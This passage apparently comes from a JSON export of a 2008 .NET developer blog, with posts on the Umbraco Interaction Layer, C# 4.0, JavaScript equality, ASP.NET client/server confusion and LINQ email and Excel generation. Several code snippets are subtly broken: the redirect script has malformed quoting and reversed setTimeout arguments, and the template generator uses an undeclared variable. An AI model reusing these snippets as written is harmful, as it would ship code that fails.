.NET code then sorry, it's not really of use to you (other than a purely achedemic excercise). But if you are writing .NET code and you want to interact with Umbraco nodes then this is the tool for you! All UIL-generated objects have both a parameterised and parameterless constructors for the ability to do the following: Constructing new CMS documents Opening existing CMS documents from the ID Opening existing CMS documents from the Unique ID (GUID) Opening existing CMS documents from an existing CMS node (only supported as part of the partial-class implementation, it's a protected constructor) All data is imported from Umbraco when the constructor is used so there is full access to the data as it would be in Umbraco itself (or viewed on the page). UIL-generated objects also provide the standard features you would be expecting on a document such as: Save Publish Unpublish So really UIL objects (in theory) will provide all the interaction that is required from a developer. Other things, which I have mentioned in previous posts that the UIL provides are: Validation of properties against Regex Mandatory checking Event raising for PropertyChanging and PropertyChanged And of course there is the LINQ API, which provides strongly typed relationships to child items within the content tree.\nThis is really useful if you have a \"data\" structure which I mentioned earlier. The Umbraco API does provide the child relationships, but you just get back all children, so to find the ones of the type you want you must know the docType ID. The UIL will handle the type-detection on-your-behalf. As I have mentioned many a time the LINQ API is not perfect and one of its biggest limitations is that there is no way to view all children straight from the a single property. This is not planned for the v1 release. So just when should I use the UIL? Since the UIL is a developer tool there are several good locations which are common to most Umbraco developers (excluding custom development): Action Handlers Document events (in v4) Web Services Silverlight Both Per and Ruben have done good posts recently about how to use Action handlers and Event handlers (in v4) (although their posts don't really look at manipulating the document itself), and these are perfect locations if you want to modify a document during its life cycle. Web Services, particularly JSON services are another great example. The UIL classes all have a DataContract generated against them which you can be used along with the DataContractJsonSerializer to generate JSON representations of your docTypes. Great for AJAX implementations! And lastly Silverlight. Because all classes generate inherit both INotifyPropertyChanging and INotifyPropertyChanged it is possible to tie the UIL objects directly to a Silverlight app and have dynamic updates occuring very nicely.\nI'll admit this is highly experimental and i haven't actually tried it (I have done very little Silverlight dev) but I do know that in theory it can work.   Well there you have it, I hope this sheds a bit of light on the UIL and whether it is a useful tool for your needs. Stay tuned for RC 2 which will be out very soon (I found a couple of very big bugs which I'm addressing at the moment) and if you have any feedback, comments, abuse, bugs or feature requests please feel free to drop me a line on me at aaron-powell dot com, leave a comment on my blog or raise an issue on the UIL CodePlex site. ", "id": "2008-12-11-dont-you-worry-about-planet-express-let-me-worry-about-blank" }, { "title": "Combining Paths", "url": "https://www.aaron-powell.com/posts/2008-12-05-combining-paths/", "date": "Fri, 05 Dec 2008 00:00:00 +0000", "tags": [ "generic .net" ], "description": "", "content": " Maybe I'm a slow learner or maybe this is one of those beautifully hidden features of the .NET framework but I came across a nifty little static method (thanks to this post on StackOverflow), Path.Combine(string1, string2); I can't count the number of times I'd written a method to ensure a trailing \\, and append one if it didn't exist, all because of some lack-of-knowledge. So keep this method handy in your knowledge bag for next time you are building file system paths! ", "id": "2008-12-05-combining-paths" }, { "title": "Umbraco Interaction Layer - RC1", "url": "https://www.aaron-powell.com/posts/2008-12-05-umbraco-interaction-layer-rc1/", "date": "Fri, 05 Dec 2008 00:00:00 +0000", "tags": [ "Umbraco.InteractionLayer", "umbraco" ], "description": "", "content": " Well I've gone and beaten the Umbraco guys to RC1, although I'm sure v4 RC1 is just around the corner. But, none the less I'm happy to have RC1 of the UIL ready for download. There's actually very little changed between Beta 1 and RC1. There's a little bit of a code clean up, and I've addressed a bug which was found by a colleague of mine. She found that if you didn't generate all the Doc Types an exception was thrown if you'd omitted a Doc Type which was a child relation of anyother. Something which I had initially planned to do was produce an Umbraco package for the UIL so it was easier to install into Umbraco. I have now decided against doing so. This isn't really because I'm just too lazy to get around to it, I do actually have a good reason for this. The idea of an Umbraco package is it is something which should always be apart of the Umbraco site. The UIL is not designed for that. The UIL is only meant to be on the development version, and only for a short period of time.\nIt's the same reason you wouldn't have a DBML file on a production site, nor would you have a C# file.\nThe UIL isn't meant to be installable by knowledgable end-users. It's a developer tool and adding it should require someone who's smarter than the average bear. So although it's not a lot of changes in the code base there is actually a change in the project format, the project is now completely open source! That's right, you can now find the UIL on CodePlex :D. So you can easily check out the mess which is my source code, in all its spaghetti glory!\nYes, at the moment there is no real comments (I'm a stickler for commented code as anyone I work with will atest to).\nYes, there is a demo application in there so you can see one I prepared earlier ;). You will find the download links on the CodePlex project. Happy Hacking! ", "id": "2008-12-05-umbraco-interaction-layer-rc1" }, { "title": "Once you go black...", "url": "https://www.aaron-powell.com/posts/2008-12-02-once-you-go-black/", "date": "Tue, 02 Dec 2008 00:00:00 +0000", "tags": [ "visual-studio", "random" ], "description": "", "content": " So about 2 months ago I decided to start playing around with Visual Studio schemes to find something that was just right for dev work. I'd always been a standard VS scheme user, white back, standard colours for the fonts. The only thing I did differently was use Consolas 10pt font.\nConsolas is a beautiful font for coding in and I highly recommend anyone who hasn't tried it to get it going. It's a free download from the MS website, and I believe it's part of the Vista install. So anyway, I'm out shopping for a new look for VS, white was soo 2003 and I needed a change.\nConsidering I started my programming back in *nix with Pico and Emacs (nope, never got into vi) I grew up on the white-on-black look. I got sent this website - http://www.frickinsweet.com/tools/Theme.mvc.aspx, which is for generating VS scheme files with a few easy tweaks. With my exceptional graphics ability and knowledge of colour (I struggle to draw a stick person, and anyone who's met me knows I'm brilliant with colour from a fasion sence) I get cracking.\nAnd it was a distaster, an utter disaster. I couldn't make out the fonts from the horrible contrasts between the black and fluro foreground! With a quick reset of VS themes I was back on the hunt, and then I came across this - http://www.lnbogen.com/VisualStudioNet2005Colors.aspx.\nIt was beautiful, so I eagerly downloaded the theme, opened it up in VS and was pleasently surprised, it looked just as I'd hoped. I did a quick tweak to take the font size down to 10pt (I like to have a lot on the screen and smaller fonts help with that) and then I was in dark-scheme heaven. And now, 2 months on, I couldn't think of changing back to a white-based scheme. When ever I'm helping someone else and they have a white-based scheme it hurts my eyes. If you've never ventured into the relm of non-standard themes I strongly suggest you do. You don't know what you're missing out on!\nThere's a nice gallery on Scott Hanselmans blog - http://www.hanselman.com/blog/VisualStudioProgrammerThemesGallery.aspx or if you prefer to get really nerdy, check out the IDE hot-or-not! http://idehotornot.ning.com/ ", "id": "2008-12-02-once-you-go-black" }, { "title": "Mocking with SharePoint", "url": "https://www.aaron-powell.com/posts/2008-11-25-mocking-with-sharepoint/", "date": "Tue, 25 Nov 2008 00:00:00 +0000", "tags": [ "sharepoint", "unit-testing" ], "description": "", "content": " So while going through my blogs I came across one about a new mocking framework specifically designed for unit testing within SharePoint. The blog can be found here and from their website they have several demos of using Isolator for SharePoint mocking. I'm interested in having more of a play with it, and Typemock are offering a free license for so: Typemock are offering their new product for unit testing SharePoint called Isolator For SharePoint, for a special introduction price. it is the only tool that allows you to unit test SharePoint without a SharePoint server. To learn more click here. The first 50 bloggers who blog this text in their blog and tell us about it, will get a Full Isolator license, Free. for rules and info click here. But I do wonder about the overall benefit of Isolator. Without playing with it I can't make any conclusions but I've always found mocking can be a dicy subject, particularly if you're mocking something which can have an impact on the underlying operation of the code\nAnd that is a concern about mocking the SharePoint API. I'm am a fan of RhinoMocks and have played with it and found it really useful when I was stubbing up interfaces, but I never took it to the level of mocking up full API-level components (although I really do want to get around to trying it to get around some of the limits of the Umbraco API!). I'll try and do some more investigation on Typemock's Isolator for SharePoint and see what I can find. If it really does what they say it does it could make it easier to develop SharePoint API-prototypes without the need for a SharePoint environment.   ", "id": "2008-11-25-mocking-with-sharepoint" }, { "title": "Umbraco Interaction Layer - Beta 1", "url": "https://www.aaron-powell.com/posts/2008-11-19-umbraco-interaction-layer-beta-1/", "date": "Wed, 19 Nov 2008 00:00:00 +0000", "tags": [ "Umbraco.InteractionLayer", "umbraco" ], "description": "", "content": " Well loyal readers I am proud to announce the release of the Umbraco Interaction Layer... Beta 1! Yep that's right, I've completed my primary set of features and now it's just a matter of testing and a full testing and v1 will be out the door. This release brings a few new features, it also brings in a few breaking changes from the preview releases. An as with Preview 3 this release supports Umbraco v3 and v4 (although it's only been tested againt v4 Beta 2 Take 2, but from my understanding of Take 3 there are no changes to the API sections the UIL relies upon). So what new features can be found in Beta 1? User specified namespace More Umbraco API pass-throughs Unpublish Delete User specified namespace This was a feature I have been wanting to put into since the earliest version of the UIL but it'd been on my back list of features. Well it's in there. Finally. More Umbraco API pass-throughs So in an effort to make the UIL code a complete replacement for the Umbraco document API (sorry Umbraco guys, it's nothing personal ;)) I have added a few more pass throughs, now you can access the user who created the document, unpublish and delete. Yep, finally I have complete CRUD supprt, not just CRU which it has been since Preview 1. Notification of generation complete   Yeah this was something else on the \"things I had to do\" list, now when you generate your code you'll get a lovely little Umbraco bubble to tell you that it has completed. Aww aint it pretty! Breaking changes As I mentioned there are several breaking changes in this release, these are just around the settings for the UIL generator and the UIL generated code. Previously I was using the appSettings collection for some of settings but now they have been promoted to their own settings section. There is an included config file in the Beta 1 packages which shows it's use. Also I have included a config section for the User ID of the user responsible for the creating of new nodes and the publishing of nodes. These are newly exposed properties within the generated UIL code. This just gives more control over the data that is ultimately visible from within the CMS. And to finish it off here are the links: UIL Beta 1 for Umbraco 3 UIL Beta 1 for Umbraco 4 ", "id": "2008-11-19-umbraco-interaction-layer-beta-1" }, { "title": "Maintaining client sessions", "url": "https://www.aaron-powell.com/posts/2008-11-13-maintaining-client-sessions/", "date": "Thu, 13 Nov 2008 00:00:00 +0000", "tags": [ "ajax", "asp.net" ], "description": "", "content": " In my recent blog browsing I came across an interesting post from Joel at See Joel Program on maintaining an ASP.NET session within an AJAX application. It's a very good post and a very good solution Joel has come up with. I'm a big fan of Joel's work, I love the client event pool, it's such a useful way to have cross-eventing in RIA's. In the end of his post though he states that it's not an overly useful solution and that you can increase the session timeout rather than using client eventing to refresh the session.\nTo an extent I do agree with this, really short timeouts and then constantly refreshing the session isn't a good solution, you don't get any real performance increases. But I can see a good use for timed-session refreshing. A lot of the project I work on are CMS heavy projects. We'll have a big CMS backed with functionality dotted all around the place.\nRecent I worked on a website which has a login component to it, it's built on top of Umbraco and we used the Umbraco membership provider.\nWhen logging in we use the session to store the logged in information (the Umbraco members do support cookies but we wanted a really short login period plus the cookies login has a few problems). So we need to ensure that the session stays active. There's some very content-heavy sections of the site so we don't want people to be reading stuff and then go to navigate away only to find themselves logged out.\nWe combated this with a large session timeout. This means we do have additional presure on the server to cater for the scenario where a page is left active for a long time. Generally speaking people move around a site very frequently so the session is constantly being kept alive by postbacks and new requests, so we're really adding load for the small percentage. This is an example where I think that Joel's solution is a good idea as it can allow for an unobtrusive keep alive on these kind of pages.\nIt would also mean you can have a more appropriate session timeout and use the nature of the site (frequent movement) to do the standard session keep alive. I like this solution from Joel, it's a good example of how you can keep active servers from a client. It's also a good example of the power of a client event pool. ", "id": "2008-11-13-maintaining-client-sessions" }, { "title": "Umbraco Interaction Layer - Preview 3, take 2", "url": "https://www.aaron-powell.com/posts/2008-11-11-umbraco-interaction-layer-preview-3-take-2/", "date": "Tue, 11 Nov 2008 00:00:00 +0000", "tags": [ "Umbraco.InteractionLayer", "umbraco" ], "description": "", "content": " Well I release the UIL Preview 3, and in my work to support Umbraco v4 Beta 2 I found a change with the GetAll property signatures. As you may notice reading the comments in my blog post the long-reaching effects of the change were not really considered and it actually resulted in a lot of breakages! Well the Umbraco team has release Umbraco v4 Beta 2, Take 2 which corrects the issue, but subsequently left the UIL not working in the latest official v4 release! So I've updated the UIL and celebrated it with a Take 2 release of my own. This release is just a recompile of the v4-targeted package, if you want the v3-targeted package use the original UIL Preview 3 release. ", "id": "2008-11-11-umbraco-interaction-layer-preview-3-take-2" }, { "title": "Umbraco Interaction Layer - Preview 3", "url": "https://www.aaron-powell.com/posts/2008-11-06-umbraco-interaction-layer-preview-3/", "date": "Thu, 06 Nov 2008 00:00:00 +0000", "tags": [ "Umbraco.InteractionLayer", "umbraco" ], "description": "", "content": " In between the time spent packing and unpacking while moving house I've been working on my next release of the UIL, and I'm happy to say that it is ready and it is exciting. There is a breaking change between Preview 2 and Preview 3, but there are also a few new juicy features. Breaking changes The biggest breaking change with Preview 3 is that I have removed the interface IDocType. While working on the UIL I came to realise that having both an abstract base class and an interface was some-what redundant. When ever downcasting is needed it should always be done to the base class, so I have removed the interface to avoid confusion. Another major change is the dependencies of this release, no longer is the generated code supporting .NET 2+, it's now only supporting .NET 3.5+ (ok, I haven't tested it with .NET 4, but I'm just guessing there :P). Juicy new bits So I said there were some juicy new bits in this release and I'm quite excited about them, so let's have a look. Better support for the Umbraco API I have done some work to improve the features of the DocTypeBase class to have more of the Umbraco API operations, for that I have done the following changes: CreatedDate property Now you can access the date that the Umbraco document was created Save overload method I have added an overload to Save which now mimics the Save & Publish function from the Umbraco UI  So now it is even easier to programmatically create Umbraco pages and publish them on your site! Support for Umbraco v4 Yep, that's right, I have finally got official support for the Umbraco v4 API! If anyone had been brave and tried Preview 2 in an Umbraco 4 site they would have seen the failure which ensued. Turns out that the Umbraco devs have finally upgraded all the GetAll methods to return List, not an array. A nice little change (keep in mind that Umbraco was originally .NET 1.1 so the array was probably a hold over from the pre-generics days), but it did mean that the UIL failed as the property signatures no longer matched what it was compiled against. But never fear, this release supports v4 (there are actually 2 download packages available, one for v3 and one for v4). This does not mean I am stopping v3 support, Umbraco v3 will be supported along with Umbraco v4. VB support Ok, I kind of already had this, the UIL has always been able to generate Visual Basic files, but if anyone had tried to use them well they would have seen that it didn't go so well. I'm not a Visual Basic developer, I haven't used VB for a number of years now so it was always there but I never tested it. Well it turned out that the VB files I was generating were no good at all. Preview 3 has been fully tested and now created compiling VB files! LINQ to Umbraco That's right sports fans, I now have a working implementation of LINQ to Umbraco. *cue applause* Check this shit out: HomePage home = new HomePage(1000); var textPages = home.TextPages.Where(tp => tp.CreatedDate == DateTime.Now.AddDays(-7)).OrderBy(tp => tp.CreatedDate).GroupBy(tp => tp.Keywords); (I used Lambda syntax cuz otherwise my formatting will be broken horribly). What LINQ to Umbraco is and what it isn't Ok, I need to make one thing clear, this LINQ to Umbraco implementation is not super clean. The current Umbraco API does not really support what I want to do, which means that I have had to have some hacks in place. The first thing you'll notice if you have a look at the code is that it's not really optimised. There is no query language in the Umbraco API for me to use, which means I have to rely on standard IEnumerable extension methods. So when you're accessing the child items you will be given all the items and then a filter will be applied.\nUnfortunately there isn't a way around this, not in the current API at least. That doesn't mean that this implementation isn't useful, it just means that if you're going into large child structures be aware that it may be slow and it may have a large memory footprint. Additionally I (currently) don't support the saving of child items/ adding child items to Umbraco. So if you do get an item from the collection make sure that you call Save on it.\nI am working on this and it should be ready soon for the next release. But at the very least we now have an API for Umbraco which is fully LINQ enabled and completed .NET runable. I really would love to solve the performance problem but I don't think that it can be done with the current API, not without a lot of ugly code.'   Downloads So if you want to check out Preview 3 make sure you grab the right one for your Umbraco: UIL for Umbraco 3 UIL for Umbraco 4 ", "id": "2008-11-06-umbraco-interaction-layer-preview-3" }, { "title": "C# 4.0", "url": "https://www.aaron-powell.com/posts/2008-10-31-csharp-4/", "date": "Fri, 31 Oct 2008 00:00:00 +0000", "tags": [ "c#" ], "description": "", "content": " As most people would know PDC is on at the moment over in the US and as usual Microsoft is showing their bag-o-tricks about what they are working on. With PDC we saw a CTP release of Visual Studio 2010, and with this brings the .NET 4.0 framework and the next incantation of the C# language, C# 4.0. I recently watched a screen cast session from PDC on the future of the C# language (link here), a session run by Anders Hejlsberg who is an excellent authority in the area of programming language design.\nI strongly recommend that you watch the session if you are interested in where C# is going as a language. Be aware it's a 70 minute session and pretty full-on in some parts. So what are the new features coming with C# 4.0? The Dynamic keyword Anyone who's done a lot of work with C# 3.0, particularly with hard-core Lambda shouldn't be surprised by this move. C# is getting more dynamic programming features built into it, through the use of a dynamic keyword. Justin Etheredge has done two good posts which look at the dynamic keywork and how it can be used. Anders also has a good demo in the screencast. For me it's a little too early to have much of an opinion on this feature, I'm definately in two minds over it. On one side I really like the ability C# is going to have to tie straight into Ruby or Python or JavaScript with next to no changes to the code, but on the flip side is brings in a greater chance of errors. ASP.NET developers are familiar with dynamic languages in the form of JavaScript, and any ASP.NET developer who's done a lot of JavaScript will tell you just how much of a pain in the arse it can be to debug. Because there's no compiler we don't know until run-time that there's a problem. Additionally intellisense suffers in a dynamic world vs a static one.\nAnd that's something I noticed from Anders talk, that when we're using the dynamic keyword in C# we loose the intellisense capabilities. Until I have a chance to actually play with it in practical scenarios I'm not going to know whether it's really a useful idea at the moment. Named and default parameters What can be said about this other than \"about fucking time!\". Essentially this means that when defining method stubs parameters can be given a default value so they are optional in use. No more writing stacks of overloads to cater for every scenario of missing parameters, now it's just a single method with the defaults flagged appropriately. Named parameters are also really nice, and to me it feels a lot like JSON parametering on methods in JavaScript. Just define the parameters to pass in and problem solved. Both of these are to a certain extent syntactic sugar. It'll be interesting to see just what the compiler generates at an IL level to see what kind of performance hit may be resulted from this. Co and Contra variants This is definitely an interesting concept and something that I'm still getting my head around. For that reason I wont go into it here but watch the screen cast for more information. From what I'm understanding of it they are going to be useful and it'll bring another level of power on top of the already awesome Generics framework. Improved COM interop Ok, so not really a commonly used feature of ASP.NET but the improved COM support (some-what as a side effect of default parameters) does mean that when coding against COM, like the Office interop, will be a whole lot nicer and a whole lot more viable. C# post-4.0 So the last bit of the screen cast is Anders talking about what they are looking at with C# post version 4 and what he talks about is the compiler and it's ultimate role in the language. Anyone who reads Bart de Smet's blog will have seen he did a Channel9 video recently (and if you didn't watch it you should!) where he talked about something Anders demos. It's the concept of the C# compiler as a service. This means that you can dynamically generate C# code which is then passed to the compiler and executed on the fly. If you're not really sure what this means, check out the program LinqPad (I blogged on it last month), LINQPad opens up the compiler in a similar way, making it something that you can write code and pass to, rather than having to write code, make a DLL and execute. Compiler as a Service is a very cool concept and really opens up the ability to generate code on the fly. Less reliance on CodeDom and System.Reflection is a great idea (as I can attest to from my work on the UIL!).   The C# future definitely looks like a bright one. C# 4.0 doesn't seem to quite be the 'knock your socks off' release that C# 3.0 was but it's a move in the right direction and a very interesting one for sure. ", "id": "2008-10-31-csharp-4" }, { "title": "When == isn't equal", "url": "https://www.aaron-powell.com/posts/2008-10-25-when-equal-isnt-equal/", "date": "Sat, 25 Oct 2008 00:00:00 +0000", "tags": [ "ajax", "javascript" ], "description": "", "content": " Earlier this month I did a post about common mistakes made by developers new to JavaScript but there's a point I forgot to cover which I see a lot of. Nearly every language has a different way in which it handles equality. SQL has a single equal sign ala: SELECT [COLUMN1] FROM [Table] WHERE [COLUMN2] = 'some value' Or you have compiled languages like C# which use ==: if(someValue == someOtherValue){ } Or for some wierd reason LINQ uses the keyword equal when it does join operations... And then we get to JavaScript. JavaScript actually has 2 equality comparison, == and === (the same exists for inequality in != and !==), but why?\nYou need to remember that JavaScript is an loosly typed language, you don't define a variable type, you define it by the the assignment. This also means you can retype a variable during its life. So what's the got to do with the equality operators? Well the choice of equality comparison depends how strongly checked you want to make your comparison.\nSay what? Well, == compares the values at a primitive level, regardless of their types, where as === also does a type comparison. Take the following example: var someValue = 1; alert(someValue == '1'); alert(someValue === '1'); Both alerts will show true, but in the first alert we're comparing a number to a string. That's likely to be a problem if you're comparing two variables! It's a good way to get unexpected behavior from your JavaScript.\nAs Ruben has correctly pointed out below the first alert shows true and the second shows false (note - don't blog while watching TV, you tend to not pay attention :P). Because we are comparing a number to a string we generally do not want it to be true. This is most commonly noticed when comparing two variables and can lead to unexpected behavior during script execution. So should you ever use an untyped equality comparison? Well yes if the type of whats being compared is either a) definitely known (ie - prechecked) b) not going to have bearing on the continued operation of the script. Well there's something to keep in mind the next time you think JavaScript is out to get you with unexpected operation. ", "id": "2008-10-25-when-equal-isnt-equal" }, { "title": "The difference between client and server", "url": "https://www.aaron-powell.com/posts/2008-10-06-the-difference-between-client-and-server/", "date": "Mon, 06 Oct 2008 00:00:00 +0000", "tags": [ "asp.net", "ajax" ], "description": "", "content": " Recently I've been doing a lot of AJAX work, I'm preparing a presentation on best practices. I've also been helping some people at work who has been working on a very AJAX rich website. One thing I've found a lot over the years is that people seem to get confused about the different between server and client and what can be done from one or the other.\nAnd being web developers not understanding the differences can be a big issues. So I'm going to address some of the most commonly asked questions. Why doesn't my JavaScript execute?\nI can't count the number of times I've seen this code: Page.ClientScript.RegisterStartupScript(this.GetType(), \"js\", \"alert('hey!');\", true); Response.Redirect(\"/some-page.aspx\"); And had the developer ask \"Why doesn't my JavaScript execute?\". *sigh* This is an example of a developer not understanding the difference between client and server. Client code is not executed until every point of the server life cycle has completed, and then the client life cycle begins.\nThe client life cycle will vary depending on what (if any) JavaScript framework is being used. With ASP.NET the server life cycle is always the same, information on it can be found here. If you want to do a redirect after showing something in the client scope a window.location.href needs to be used. Something such as this is best: Page.ClientScript.RegisterStartupScript(this.GetType(), \"js\", \"alert('hey!');\" setTimeout(2000, function() { window.location.href='/some-page.aspx'; });, true); Why use a setTimeout? It means that the redirection is not automatic, so if you're showing something that wont pause page execusion (ie, not an alert) then it'll show your client info before redirecting. Where do I put my client event handlers? This is a point of conjecture, where do you put your client event handlers? Do you register them server side by adding them to the Attributes collection, do you add them to the markup of the server control or do you use your JavaScript framework to register an event handler? I'm from the school of though which states \"What happens on the client, stays on the client\". My preference, using your JavaScript framework. Why? Well I don't think that it can be expected that your UI developers, who are generally in charge of the JavaScript, need to dig around to find how all the client components come together.\nNow it's starting to make sense that JavaScript shouldn't be in the .NET. But how do you find the ASP.NET server control ID? ASP.NET generates its ID's on the fly. $get('<%= myTextBox.ClientID %>'); Easy! Or are you a jQuery fan? $('#<%= myTextBox.ClientID %>'); Each framework has a different way in which events are attached, the Microsoft AJAX framework has its $addHandler, jQuery has .bind, etc. Which JavaScript framework library should I use? This is a massively subjective question it really comes down to what you are familiar with and what you want to do. I'm a Microsoft AJAX and jQuery fan, especially since the past weeks announcement that Microsoft will be supporting jQuery along side their own framework (sweet!), I like the design pattern of Microsoft AJAX (which is built heavily on the prototype framework) but that comes back to being a .NET developer, I'm use to namespaces, classes and interfaces. All of which the MS framework brings in. But jQuery is fantastic in animation, plugin library and an awesome set of selectors. But this is because I've never played with mootools or the Yahoo! library, both of which I'm sure are great choices.   So hopefully these few common questions can be of reference or something you can point someone to next time they ask a question you can't be bothered answering. ", "id": "2008-10-06-the-difference-between-client-and-server" }, { "title": "Using LINQ to do email templates", "url": "https://www.aaron-powell.com/posts/2008-09-27-using-linq-to-do-email-templates/", "date": "Sat, 27 Sep 2008 00:00:00 +0000", "tags": [ "linq" ], "description": "", "content": " So recently I was working on project where a client wanted to have customisable email templates which could be merged with data from their database so we store the email as an XML document and have a series of placeholders within it to allow easy editing to customise the wording, layout, etc. But because there's quite a lot of different email \"data sources\" we wanted a nice and easy way so we didn't have to constantly write merge methods, having a single method which handles it all is the best idea.\nBut how do we handle all the different data sources, and since the ORM is LINQ to SQL it'd be really nice to not have to constantly write classes and structures to handle all the difference formats. So this is what I come up with. Step 1, an XML document This isn't really that complex a step, I've got it really primitive and the XML was only storing the subject and body. But it can be as complex as required, storing SMTP details, sender, recipient(s), etc. I have just 2 nodes, a Subject and a Body node, the Body of the email being stored in a CDATA to make it easier to parse. Step 2, the Email Template class Now we need a class for the email template generation, this is what I have: public class EmailTemplate{ public string Subject { get; private set; } public string Body { get; private set; } public EmailTemplate(string path){ XDocument xdoc = XDocument.Load(path); var root = xdoc.Element(\"emailTemplate\"); this.Subject = root.Element(\"subject\").Value; this.Body = root.Element(\"body\").Value; } public string GenerateBody(T data){ return Generate(this.Body, data); } public string GenerateSubject(T data){ return Generate(this.Subject, data); } private static string Generate(string source, T data){ // coming shortly } }   So now we have our class stubbed up, the constructor takes a path to an XML document and then we use a XDocument object to traverse into our XML and find the subject and body. The Subject and Body properties are made with private setters so that you can't edit the subject accidentally. Also, so that you can reuse the current loaded template the \"Generate\" methods will return a string rather than replacing the contents of the current object. Step 3, writing the Generator This is where the fun bit comes in, we're going to use Reflection to find all the properties of our Generic class and then write it to a source. private static string Generate(string source, T data){ Type theType = data.GetType(); PropertyInfo[] properties = theType.GetProperties(); properties.ForEach(p => result = result.Replace(\"{{ \" + p.Name + \" }}\", p.GetValue(data, new Object[0]).ToString())); return result; }   So to sum up I'm using Reflection to get all the properties from the object and then using the ForEach extension method (if you don't have the ForEach extension method check it out here). So for each of the properties I'll create a token (which I'm using in the form of \"{{ MyProeprty }}\") and then do a replace. I've found this template to be really effective as it'll allow for easy adding of new properties to my object without having to re-write the generation method, and it doesn't give a damn whether the property actually exists. I can quite easily use a LINQ to SQL expression like this: var myItems = ctx.MyDataItems.Select(m => new { Property1 = m.Property1, Property2 = m.Property2 }); And pass it straight in. Got to love anonymous types! ", "id": "2008-09-27-using-linq-to-do-email-templates" }, { "title": "LINQPad", "url": "https://www.aaron-powell.com/posts/2008-09-25-linqpad/", "date": "Thu, 25 Sep 2008 00:00:00 +0000", "tags": [ "linqpad" ], "description": "", "content": " I'm sure that a lot of people have played with LINQPad and if you haven't I strongly suggest you do. In short LINQPad is a C#, VB & SQL code snippet tester. A lot of people first started playing with LINQPad when it was initially released as it is a great tool to get starting with LINQ to SQL, it allowed you to connect to a database and then start writing LINQ queries and view their execusion along with their generated SQL. It's the best way to test queries as you don't need to do the standard \"create project, add DBML, write query and debug\". I've used it quite a lot since its release but never really got into what it can do. Today I started playing with it in a bit more depth and found that it is fantastically powerful!\nFirst off theres the \"Statement(s)\" mode, this is essentially a mini Visual Studio, here you can write your standard C# or your VB exactly as you would in VS and then execute it, dumping it out to the console. That's right, you can create objects, read/ write properties, build collections, basically anything you could do with a standard console application! It also has the ability to import any DLL you want (well effectiveness will vary, don't expect System.Web to be that useful!). This allows you to bring in your own extension methods, external ORMs, etc. I came across this video here: http://oreilly.com/pub/e/909 which is a webcast involving Joseph Albahari who is the developer of LINQPad. Its long (42 minutes) but definitely worth a watch. ", "id": "2008-09-25-linqpad" }, { "title": "LINQ to XML to... Excel?", "url": "https://www.aaron-powell.com/posts/2008-09-16-linq-to-xml-to-excel/", "date": "Tue, 16 Sep 2008 00:00:00 +0000", "tags": [ "linq", "generic .net" ], "description": "", "content": " The other day one of the guys I work with was trying to work out the best way to generate an Excel document from .NET as the client had some wierd requirements around how the numerical data needed to be formatted (4 decimal places, but Excel treats a CSV to only show 2). The next day my boss came across a link to a demo of how to use LINQ to XML to generate a XML file using the Excel schema sets which allow for direct opening in Excel.\nOne problem with the demo, it was using VB 9, and anyone who's seen VB 9 will know it has a really awesome way of handling XML literals in the IDE. This isn't a problem if you're coding in VB 9, but if you're in C# it can be. The VB 9 video can be found here: http://msdn.microsoft.com/en-us/vbasic/bb927708.aspx I recommend it be watched before progressing as it'll make a lot more sense against the following post. It'll also cover how to create the XML file, which I'm going to presume is already done. In the beginning Because C# doesn't have a nice way to handle XML literals like VB 9 does we're going to have to do a lot of manual coding of XML, additionally we need to ensure that the appropriate namespaces are used on the appropriate nodes. The Excel XML using 4 distinct namespaces, in 5 declarations (yes, I'll get to that shortly) so we'll start off by defining them like so: XNamespace mainNamespace = XNamespace.Get(\"urn:schemas-microsoft-com:office:spreadsheet\"); XNamespace o = XNamespace.Get(\"urn:schemas-microsoft-com:office:office\"); XNamespace x = XNamespace.Get(\"urn:schemas-microsoft-com:office:excel\"); XNamespace ss = XNamespace.Get(\"urn:schemas-microsoft-com:office:spreadsheet\"); XNamespace html = XNamespace.Get(\"http://www.w3.org/TR/REC-html40\"); Notice how the 'main namespace' and 'ss' are exactly the same, well this is how they are handled within the XML document. The primary namespace for the file is urn:schemas-microsoft-com:office:spreadsheet but in some locations it's also used as a prefix. For this demo I'm going to be using the obligatory Northwind database and I'm going to just have a simple query against the customers table like so: var dataToShow = from c in ctx.Customers select new { CustomerName = c.ContactName, OrderCount = c.Orders.Count(), Address = c.Address };   Now we have to start building our XML, the root element is named Workbook and then we have the following child groups: DocumentProperties ExcelWorkbook Styles Worksheet WorksheetOptions Each with variying child properties. First thing we need to do is set up our XElement and apply the namespaces, like so: XElement workbook = new XElement(mainNamespace + \"Workbook\", new XAttribute(XNamespace.Xmlns + \"html\", html), CreateNamespaceAtt(XName.Get(\"ss\", \"http://www.w3.org/2000/xmlns/\"), ss), CreateNamespaceAtt(XName.Get(\"o\", \"http://www.w3.org/2000/xmlns/\"),o), CreateNamespaceAtt(XName.Get(\"x\", \"http://www.w3.org/2000/xmlns/\"), x), CreateNamespaceAtt(mainNamespace), I'm using a helper method to create the namespace attribute (which you'll be able to find in the attached source), but notice how the \"main\" namespace is the last one we attach, if we don't do it this way we'll end up with the XElement detecting the same namespace and only adding it once. Also, you need to ensure that you're prefixing the right namespace to the XElement tag! DocumentProperties and ExcelWorkbook These two node groups are not overly complex, they hold the various meta-data about the Excel document we are creating, I'll skip them as they aren't really interesting and can easily be found in the source. Styles This section is really important and handy for configuring custom looks within the document. There are way to many options to configure here to cover in the demo, it's easiest to generate the styles in Excel and save the file as an XML document (or read the XSD if you really want!). If you're doing custom styles make sure you note the ID you give the style so you can use it later in your document. Also, these styles are workbook wide, not worksheet so you can reuse them on each worksheet you create. I have a very simple bold header. Generating a Worksheet Here is where the fun starts, we need to generate our worksheet. There are 4 bits of data we need to output here: Number of columns Number of Rows Header Data Rows To illistrate the power of LINQ I've actually dynamically generated the header row: var headerRow = from p in dataToShow.ToList().GetType().GetProperties() select new XElement(mainNamespace + \"Cell\", new XElement(mainNamespace + \"Data\", new XAttribute(ss + \"Type\", \"String\"), p.Name ) ); This is just a little bit of fun using LINQ and Reflection to dynamically generate the column headers ;) Next we need to output the number of columns and number of rows (keep in mind the rows is the data count + header row count): new XAttribute(ss + \"ExpandedColumnCount\", headerRow.Count()), new XAttribute(ss + \"ExpandedRowCount\", dataToShow.Count() + 1), Now we put out the header cells: new XElement(mainNamespace + \"Row\", new XAttribute(ss + \"StyleID\", \"Header\"), headerRow ), Then lastly we generate the data cells (note - this can be done like the header, just chose to do it differently to illustrate that it can be done several ways): (yes I used an image this time, the formatting is a real bitch in the Umbraco WYSIWYG editor!). Lastly there needs to be a WorksheetOptions node, and then you can combine all the XElements together, add it 